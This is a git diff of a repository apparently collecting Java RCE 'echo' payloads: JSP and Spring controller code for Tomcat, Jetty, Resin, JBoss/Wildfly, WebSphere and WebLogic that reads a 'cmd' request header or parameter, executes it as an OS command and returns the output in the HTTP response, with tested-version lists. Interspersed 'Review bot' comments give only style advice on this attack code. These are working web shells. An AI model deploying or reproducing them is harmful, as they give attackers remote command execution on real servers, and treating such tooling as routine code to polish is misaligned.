diff --git a/JBoss(Wildfly)/README.md b/JBoss(Wildfly)/README.md
new file mode 100644
index 0000000..fcba90d
--- /dev/null
+++ b/JBoss(Wildfly)/README.md
@@ -0,0 +1,7 @@
+# JBoss(Wildfly) 回显
+
+## 效果
+![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/JBoss(Wildfly)/img/JBossEcho.png)
+
+## 参考
+[https://developer.jboss.org/thread/169877](https://developer.jboss.org/thread/169877)
diff --git a/JBoss(Wildfly)/code/JBossEcho.jsp b/JBoss(Wildfly)/code/JBossEcho.jsp
new file mode 100644
index 0000000..1498b7e
--- /dev/null
+++ b/JBoss(Wildfly)/code/JBossEcho.jsp
@@ -0,0 +1,18 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ io.undertow.servlet.spec.HttpServletRequestImpl req = (io.undertow.servlet.spec.HttpServletRequestImpl) javax.security.jacc.PolicyContext.getContext("javax.servlet.http.HttpServletRequest");
+ String cmd = req.getParameter("cmd");
+ if(cmd != null && !cmd.isEmpty()) {
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.io.OutputStream os = req.getExchange().getOutputStream();
+
+ byte[] bytes = new byte[1024];
+ int len = 0;
+ while ((len = in.read(bytes)) != -1) {
+ os.write(bytes, 0, len);
+ }
+
+ os.close();
+ in.close();
+ }
+%>
\ No newline at end of file
diff --git a/JBoss(Wildfly)/img/JBossEcho.png b/JBoss(Wildfly)/img/JBossEcho.png
new file mode 100644
index 0000000..3abf5fe
Binary files /dev/null and b/JBoss(Wildfly)/img/JBossEcho.png differ
diff --git a/Jetty/code/jetty789Echo.jsp b/Jetty/code/jetty789Echo.jsp
index 847e28e..4028bf4 100644
--- a/Jetty/code/jetty789Echo.jsp
+++ b/Jetty/code/jetty789Echo.jsp
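Review bot: JBossEcho.jsp has no header comment, so the versions it was verified against and the reference thread exist only in the two README files and will not travel with the code; a first-line `<%-- Tested on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1; see https://developer.jboss.org/thread/169877 --%>` would keep them together. As a point of style, `int len = 0;` initialises a value that the `while` condition overwrites before it is ever read, so `int len;` states the same thing without the misleading default. The `os.close()` / `in.close()` pair also sits after the copy loop rather than in a `finally` or try-with-resources, which is the usual shape for two `java.io` streams in this JSP.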
@@ -24,14 +24,17 @@
 obj = method.invoke(connection, null);
 method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
- obj = method.invoke(obj, new Object[]{"cmd"});
+ String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
- printWriter.println(res);
+ method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
+ printWriter.println(res);
+ }
+ break;
 }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
 java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
 Object httpChannel = method.invoke(obj, null);
@@ -40,16 +43,19 @@
 obj = method.invoke(httpChannel, null);
 method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
- obj = method.invoke(obj, new Object[]{"cmd"});
-
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
-
- method = httpChannel.getClass().getMethod("getResponse", null);
- obj = method.invoke(httpChannel, null);
-
- method = obj.getClass().getMethod("getWriter", null);
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
- printWriter.println(res);
+ String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ method = httpChannel.getClass().getMethod("getResponse", null);
+ obj = method.invoke(httpChannel, null);
+
+ method = obj.getClass().getMethod("getWriter", null);
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
+ printWriter.println(res);
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Jetty/code/jetty78Echo.jsp b/Jetty/code/jetty78Echo.jsp
index 6165920..cda8dbd 100644
--- a/Jetty/code/jetty78Echo.jsp
+++ b/Jetty/code/jetty78Echo.jsp
@@ -22,13 +22,16 @@
 obj = method.invoke(connection);
 method = obj.getClass().getMethod("getHeader", String.class);
- obj = method.invoke(obj, "cmd");
+ String cmd = (String)method.invoke(obj, "cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
+ method = connection.getClass().getMethod("getPrintWriter", String.class);
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
+ printWriter.println(res);
+ }
- method = connection.getClass().getMethod("getPrintWriter", String.class);
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
- printWriter.println(res);
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Jetty/code/jetty9Echo.jsp b/Jetty/code/jetty9Echo.jsp
index 67a0aff..9b5e807 100644
--- a/Jetty/code/jetty9Echo.jsp
+++ b/Jetty/code/jetty9Echo.jsp
@@ -24,16 +24,19 @@
 obj = method.invoke(httpChannel);
 method = obj.getClass().getMethod("getHeader", String.class);
- obj = method.invoke(obj, "cmd");
-
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
-
- method = httpChannel.getClass().getMethod("getResponse");
- obj = method.invoke(httpChannel);
-
- method = obj.getClass().getMethod("getWriter");
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
- printWriter.println(res);
+ String cmd = (String)method.invoke(obj, "cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ method = httpChannel.getClass().getMethod("getResponse");
+ obj = method.invoke(httpChannel);
+
+ method = obj.getClass().getMethod("getWriter");
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
+ printWriter.println(res);
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/README.md b/README.md
index f301609..6dc3acc 100644
--- a/README.md
+++ b/README.md
@@ -5,7 +5,9 @@
 - [x] Windows通用回显
 - [x] Spring回显
 - [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22)
-- [x] Weblogic
+- [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0)
+- [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5))
+- [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1)
 - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15)
 - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908, failed on 8.0.3.v20160908, 7.2.1.v20101111)
diff --git a/Resin/code/resinEcho.jsp b/Resin/code/resinEcho.jsp
index d9a6b19..da00953 100644
--- a/Resin/code/resinEcho.jsp
+++ b/Resin/code/resinEcho.jsp
@@ -1,6 +1,6 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
- Class clazz = Thread.currentThread().getClass();
+ Class clazz = Thread.currentThread().getClass();
 java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
 field.setAccessible(true);
 Object obj = field.get(Thread.currentThread());
@@ -21,14 +21,19 @@
 if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
 com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
 String cmd = httpRequest.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
- httpResponse.setHeader("Content-Length", res.length() + "");
- java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
- method.setAccessible(true);
- com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
- httpResponseStream.write(res.getBytes(), 0, res.length());
- httpResponseStream.close();
+
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
+ httpResponse.setHeader("Content-Length", res.length() + "");
+ java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
+ method.setAccessible(true);
+ com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
+ httpResponseStream.write(res.getBytes(), 0, res.length());
+ httpResponseStream.close();
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Spring/README.md b/Spring/README.md
index 06fd49e..579a2f0 100644
--- a/Spring/README.md
+++ b/Spring/README.md
@@ -1,4 +1,4 @@
-# Spring回显
+# Spring 回显
 ## 依赖
 * Spring-web.jar
diff --git a/Spring/code/SpringMVCTestController.java b/Spring/code/SpringMVCTestController.java
index 7552318..cd936d0 100644
--- a/Spring/code/SpringMVCTestController.java
+++ b/Spring/code/SpringMVCTestController.java
@@ -19,8 +19,10 @@ public User Test() throws IOException {
 javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
 String cmd = httprequest.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- httpresponse.getWriter().println(res);
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ httpresponse.getWriter().println(res);
+ }
 return new User();
 }
diff --git a/Spring/code/SpringWebFlowTestController.java b/Spring/code/SpringWebFlowTestController.java
index c6d73b9..82f13c6 100644
--- a/Spring/code/SpringWebFlowTestController.java
+++ b/Spring/code/SpringWebFlowTestController.java
@@ -26,8 +26,10 @@ public String test() throws IOException {
 javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse();
 String cmd = request.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- response.getWriter().println(res);
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ response.getWriter().println(res);
+ }
 return "test";
 }
diff --git "a/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp"
new file mode 100644
index 0000000..35c7ecd
--- /dev/null
+++ "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp"
@@ -0,0 +1,56 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+
+// 参考:
+// 《tomcat不出网回显连续剧第六集》 https://xz.aliyun.com/t/7535
+
+ boolean flag = false;
+
+ javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
+ java.lang.reflect.Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
+ field.setAccessible(true);
+ Object obj = field.get(mbeanServer);
+
+ field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
+ field.setAccessible(true);
+ com.sun.jmx.mbeanserver.Repository repository = (com.sun.jmx.mbeanserver.Repository) field.get(obj);
+
+ java.util.Set objectSet = repository.query(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,*"), null);
+ for(com.sun.jmx.mbeanserver.NamedObject namedObject : objectSet){
+ javax.management.DynamicMBean dynamicMBean = namedObject.getObject();
+ field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
+ field.setAccessible(true);
+ obj = field.get(dynamicMBean);
+
+ field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
+ field.setAccessible(true);
+ java.util.ArrayList procssors = (java.util.ArrayList) field.get(obj);
+
+ field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
+ field.setAccessible(true);
+ for(int i = 0; i < procssors.size(); i++){
+ org.apache.coyote.Request req = (org.apache.coyote.Request) field.get(procssors.get(i));
+ String cmd = req.getHeader("cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
+ byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
+
+ Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
+ try {
+ Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
+ obj = cls.newInstance();
+ cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
+ resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+ } catch (NoSuchMethodException var5) {
+ Class cls = Class.forName("java.nio.ByteBuffer");
+ obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
+ resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+ }
+
+ flag = true;
+ }
+
+ if(flag) break;
+ }
+ }
+%>
diff --git a/Websphere/README.md b/Websphere/README.md
new file mode 100644
index 0000000..6cfeb58
--- /dev/null
+++ b/Websphere/README.md
@@ -0,0 +1,5 @@
+# Websphere 回显
+
+## 效果
+![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/Websphere/img/001.png)
+
diff --git a/Websphere/code/websphereEcho.jsp b/Websphere/code/websphereEcho.jsp
new file mode 100644
index 0000000..b507eb7
--- /dev/null
+++ b/Websphere/code/websphereEcho.jsp
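Review bot: The new Tomcat TypeB JSP reads like decompiler output rather than hand-written source: `java.util.ArrayList procssors` is misspelled and a raw type, `catch (NoSuchMethodException var5)` keeps a synthetic local name, and `new Integer(0)` / `new Integer(result.length)` use boxing constructors that are deprecated since Java 9. `java.util.List processors = (java.util.List) field.get(obj);` together with `Integer.valueOf(0), Integer.valueOf(result.length)` (or plain autoboxing) would read as intended code, and the `flag` / `if(flag) break;` pair is what a labelled `break` on the outer `for` expresses directly. The header comment cites the xz.aliyun.com article but says nothing about which Tomcat versions this TypeB variant was checked on, which the file name's 全版本 ("all versions") only implies; the top-level README's tested-version list is attached to the generic Tomcat entry, not to this file. The ternary on the `cmds` line is also broken across two physical lines in the diff rendering, so the `new String[]{"cmd.exe", ...}` continuation appears without a `+` marker.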
@@ -0,0 +1,28 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ Class clazz = Thread.currentThread().getClass();
+ java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals");
+ field.setAccessible(true);
+ Object obj = field.get(Thread.currentThread());
+
+ Object[] obj_arr = (Object[]) obj;
+ for(int i = 0; i < obj_arr.length; i++){
+ Object o = obj_arr[i];
+ if(o == null) continue;
+
+ if(o.getClass().getName().endsWith("WebContainerRequestState")){
+ Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]);
+ Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]);
+
+ String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]);
+ printWriter.println(res);
+ }
+
+ break;
+ }
+ }
+%>
diff --git a/Websphere/img/001.png b/Websphere/img/001.png
new file mode 100644
index 0000000..e52c345
Binary files /dev/null and b/Websphere/img/001.png differ
diff --git a/weblogic/README.md b/weblogic/README.md
index d562358..a2f1097 100644
--- a/weblogic/README.md
+++ b/weblogic/README.md
@@ -1,4 +1,4 @@
-# Weblogic 反序列化回显
+# Weblogic 回显
 ## 说明
 代码直接搬运了 ```lufei``` 师傅的代码
diff --git a/weblogic/code/WeblogicEcho.jsp b/weblogic/code/WeblogicEcho.jsp
new file mode 100644
index 0000000..aaf3d18
--- /dev/null
+++ b/weblogic/code/WeblogicEcho.jsp
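Review bot: websphereEcho.jsp has no comment explaining why it scans the `wsThreadLocals` array by index and matches the entry by `getClass().getName().endsWith("WebContainerRequestState")` rather than by type, which a reader who does not know WebSphere's thread-local layout needs in order to maintain it; presumably the name match avoids a compile-time dependency on the WebSphere classes, as the purely reflective `getMethod` calls that follow suggest, but the file should say so. A header such as `<%-- Tested on AppServer V8.5 (8.5.5.18) and V9.0 (9.0.5.5); request and response come from the WebContainerRequestState entry in wsThreadLocals --%>` would also carry the version information that currently lives only in the top-level README. Stylistically, `Class clazz` is a raw type (`Class<?> clazz`), and `obj_arr` is the only snake_case local in the file.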
@@ -0,0 +1,29 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork();
+ if(adapter.getClass().getName().endsWith("ServletRequestImpl")){
+ String cmd = (String) adapter.getClass().getMethod("getHeader", String.class).invoke(adapter, "cmd");
+
+ if(cmd != null && !cmd.isEmpty()){
+ String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) adapter.getClass().getMethod("getResponse").invoke(adapter);
+ res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+ res.getServletOutputStream().flush();
+ res.getWriter().write("");
+ }
+ }else{
+ java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
+ field.setAccessible(true);
+ Object obj = field.get(adapter);
+ obj = obj.getClass().getMethod("getServletRequest").invoke(obj);
+ String cmd = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "cmd");
+
+ if(cmd != null && !cmd.isEmpty()){
+ String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getResponse").invoke(obj);
+ res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+ res.getServletOutputStream().flush();
+ res.getWriter().write("");
+ }
+ }
+%>
diff --git a/weblogic/code/weblogic-10.0.3.jsp b/weblogic/code/weblogic-10.0.3-deprecated.jsp
similarity index 100%
rename from weblogic/code/weblogic-10.0.3.jsp
rename to weblogic/code/weblogic-10.0.3-deprecated.jsp
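Review bot: `res.getWriter().write("");` after `flush()` in both branches of WeblogicEcho.jsp writes nothing and has no comment saying why it is there; if it is needed for the response to complete, the line deserves a `// why` comment, otherwise it should go. The two branches also repeat the same six-line run-and-write block verbatim, differing only in the receiver (`adapter` versus `obj`), so a later fix in one is likely to be missed in the other. The `else` branch additionally assumes that any adapter whose class name does not end in `ServletRequestImpl` has a `connectionHandler` field with a `getServletRequest` method, without a comment naming the adapter type that shape belongs to or the versions (the README lists 10.3.6.0 and 12.1.3.0.0) on which each branch was observed.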
diff --git a/weblogic/code/weblogic-12.1.3.jsp b/weblogic/code/weblogic-12.1.3-deprecated.jsp
similarity index 100%
rename from weblogic/code/weblogic-12.1.3.jsp
rename to weblogic/code/weblogic-12.1.3-deprecated.jsp